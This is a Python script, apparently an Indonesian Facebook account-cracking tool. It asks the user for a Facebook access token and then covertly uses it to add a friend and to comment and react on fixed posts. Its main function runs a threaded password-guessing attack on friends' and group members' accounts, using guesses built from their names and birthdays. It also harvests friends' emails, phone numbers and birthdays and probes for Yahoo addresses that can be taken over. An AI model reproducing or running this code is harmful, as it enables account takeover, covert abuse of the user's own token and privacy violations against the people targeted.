br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "[!] Exit"
os.sys.exit()
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'%s;'%str(31+j))
x += ''
x = x.replace('!0','')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.06)
#########LOGO#########
logo = """
\33[31;1m██╗██╗░░██╗███████╗██╗░░██╗██████╗░██╗░░██╗
\33[31;1m██║██║░██╔╝██╔════╝██║░░██║╚════██╗╚██╗██╔╝
\33[31;1m██║█████═╝░█████╗░░███████║░░███╔═╝░╚███╔╝░
\33[31;1m██║██╔═██╗░██╔══╝░░██╔══██║██╔══╝░░░██╔██╗░
\33[31;1m██║██║░╚██╗███████╗██║░░██║███████╗██╔╝╚██╗
\33[31;1m╚═╝╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝
\033[1;41;97m Dika Andrian sr. \033[0m
"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m[\033[1;93m●\033[1;97m]\033[1;93m Sedang Masuk\033[1;97m "+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
oke = []
cpe = []
id = []
username = []
idteman = []
idfromteman = []
######MASUK######
def masuk():
os.system('clear')
print logo
print "\033[1;97m ╔ ╗"
print "\033[1;97m [\033[1;97m01\033[1;97m]\033[1;96m\033[1;97m Login Menggunakan Token Facebook"
print "\033[1;97m [\033[1;91m00\033[1;97m]\033[1;96m\033[1;97m Keluar"
print "\033[1;97m ╚ ╝"
pilih_masuk()
def pilih_masuk():
msuk = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m ")
if msuk =="":
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar kontol !"
pilih_masuk()
elif msuk =="1" or msuk =="01":
tokenz()
elif msuk =="0" or msuk =="00":
keluar()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar kontol !"
pilih_masuk()
#####LOGIN_TOKENZ#####
def tokenz():
os.system('clear')
print logo
toket = raw_input("\033[1;97m[\033[1;39m?\033[1;97m] \33[31;1mToken : \33[31;1m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
jalan ('\033[1;97m JANGAN LUPA ADD AKUN WATASHI MINAAA1!1!1')
print '\033[1;97m[\033[1;39m✓\033[1;97m]\033[1;39m Alhamdulillah'
os.system('xdg-open https://www.facebook.com/james.rodricks.3958')
bot_komen()
except KeyError:
print "\033[1;97m[\033[1;39m!\033[1;97m] \033[1;39mToken Salah !"
time.sleep(1)
masuk()
######BOT KOMEN#######
def bot_komen():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;39m[!] Token invalid"
os.system('rm -rf login.txt')
una = ('100011037908446')
kom = ('Assalamualaikum💅💅')
reac = ('ANGRY')
post = ('1229536774090908')
post2 = ('1229536774090908')
kom2 = ('Izin Pakai sc lu bang💅💅')
reac2 = ('LOVE')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=' +una+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post+'/comments/?message=' +kom+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post+'/reactions?type=' +reac+ '&access_token='+ toket)
requests.post('https://graph.facebook.com/'+post2+'/comments/?message=' +kom2+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post2+'/reactions?type=' +reac2+ '&access_token='+ toket)
menu()
######MENU#######
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
os.system('rm -rf login.txt')
masuk()
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' +toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
masuk()
except requests.exceptions.ConnectionError:
print"[!] Tidak ada koneksi"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Nama \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;93m1.\x1b[1;93m Hack facebook MBF"
print "\x1b[1;93m2.\x1b[1;93m Lihat daftar grup "
print "\x1b[1;93m3.\x1b[1;93m Informasi akun "
print "\x1b[1;93m4.\x1b[1;93m Yahoo clone "
print "\n\x1b[1;91m0.\x1b[1;91m Logout "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar kontol"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
grupsaya()
elif unikers =="3":
informasi()
elif unikers =="4":
yahoo()
elif unikers =="0":
os.system('clear')
jalan('Menghapus token')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar kontol"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Crack dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Crack dari teman"
print "\x1b[1;97m3.\x1b[1;93m Crack dari member grup"
print "\x1b[1;97m4.\x1b[1;93m Crack dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar kontol"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
idg=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="4":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mMasukan nama file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan'
raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass1 + '\n'
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass1 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass2 + '\n'
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass2 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass3 + '\n'
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass3 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Bangsat'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass4 + '\n'
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass4 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass5 + '\n'
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass5 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = 'Sayang'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass6 + '\n'
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass6 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
def grupsaya():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print("\033[1;96m[✓] \033[1;92mGROUP SAYA")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+str(id))
print("\033[1;96m[➹] \033[1;97mNama\033[1;91m: \033[1;92m"+str(nama) + '\n')
print 42*"\033[1;96m="
print"\033[1;96m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;96m[+] \033[1;92mTersimpan \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except (KeyboardInterrupt,EOFError):
print("\033[1;96m[!] \x1b[1;91mTerhenti")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan')
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except requests.exceptions.ConnectionError:
print"\033[1;96m[✖] \x1b[1;91mTidak ada koneksi"
keluar()
except IOError:
print "\033[1;96m[!] \x1b[1;91mError"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def informasi():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
aid = raw_input('\033[1;96m[+] \033[1;93mMasukan ID/Nama\033[1;91m : \033[1;97m')
jalan('\033[1;96m[✺] \033[1;93mTunggu sebentar \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 43*"\033[1;96m="
try:
print '\033[1;96m[➹] \033[1;93mNama\033[1;97m : '+z['name']
except KeyError: print '\033[1;96m[?] \033[1;93mNama\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;96m[?] \033[1;93mID\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;96m[?] \033[1;93mEmail\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mNo HP\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;96m[?] \033[1;93mNo HP\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTempat tinggal\033[1;97m: '+z['location']['name']
except KeyError: print '\033[1;96m[?] \033[1;93mTempat tinggal\033[1;97m: \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTanggal lahir\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;96m[?] \033[1;93mTanggal lahir\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mSekolah\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mTidak ada'
except KeyError: pass
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
else:
pass
else:
print"\033[1;96m[✖] \x1b[1;91mAkun tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def yahoo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Clone dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Clone dari teman"
print "\x1b[1;97m3.\x1b[1;93m Clone dari member group"
print "\x1b[1;97m4.\x1b[1;93m Clone dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
clone()
def clone():
embuh = raw_input("\n\x1b[1;97m >>> ")
if embuh =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
elif embuh =="1":
clone_dari_daftar_teman()
elif embuh =="2":
clone_dari_teman()
elif embuh =="3":
clone_dari_member_group()
elif embuh =="4":
clone_dari_file()
elif embuh =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
def clone_dari_daftar_teman():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token Invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mStart \033[1;97m...')
print ('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama+ '\n')
save = open('out/MailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/MailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_teman():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 43*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/TemanMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/TemanMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_member_group():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
id=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
